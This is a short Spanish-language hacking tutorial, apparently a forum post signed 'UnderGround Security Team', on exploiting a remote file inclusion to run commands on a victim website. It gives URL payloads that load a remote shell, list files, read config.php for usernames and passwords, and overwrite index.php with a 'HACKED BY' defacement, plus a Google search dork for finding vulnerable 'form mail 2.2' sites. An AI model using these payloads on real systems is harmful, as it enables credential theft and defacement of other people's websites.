Este es un ejemplo para los q ya han entrado al equipo de la victima y ya tienen privilegios de administrador.

La vulnerabilidad es de la siguiente forma...

w ww.Victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=coman doausar

Quieres modificar algo?

Te fijas si tienes permisos algunas shells te dicen esto:

write permission: YES es que tienes permisos de escritura

y claro si no tienes dice
write permission: NO tendras permisos y no podras hacer nada

xisten formas para tener los permisos solo me voy a lo breve

Si llegas a tener permisos haz esto:

w ww.Victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=Ls

Te saldra esto :

admin/
admin.php
classes/
components/
config.php* <--------- aka esta el USER y el pass
data/
docs/
editor/
images/
includes/
index.php <-------------- Index.php
index2.php
installations/
kaotic.pl*
lang/
mainbody.php
modules/
pathway.php
root.htm
spy.php*
templates/
uploadfiles/
xD.htm
xx.htm*
zina

si te sale el config.php has esto :

w ww.Victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=catco nfig.php

y te saldra los usuarios y pass

y si nada mas kieres Defacear el index haz esto :

w ww.victima.com/index_vulnerable?vulnerabilidad=tushell?&cmd=echoH ACKEDBYTuNICK>index.php

Buscar victimas
Este es quisas el paso mas largo y tedioso ya que cada vez son menos las paginas vulnerables a este ataque (aunque siempre hay otras vulnerablidades que se pueden explotar

Para empezar ponemos en google:

"allintext: powered by form mail 2.2" (sin comillas) y le damos a buscar.

Nos aparecen muchas webs para probar, generalmente las primeras paginas que aparcen no son vulnerables pero nunca esta de mas probar.

Busque hoy en google y me salieron 1.050.000 paginas vulnerables

A probar..

__________________

UnderGround Security Team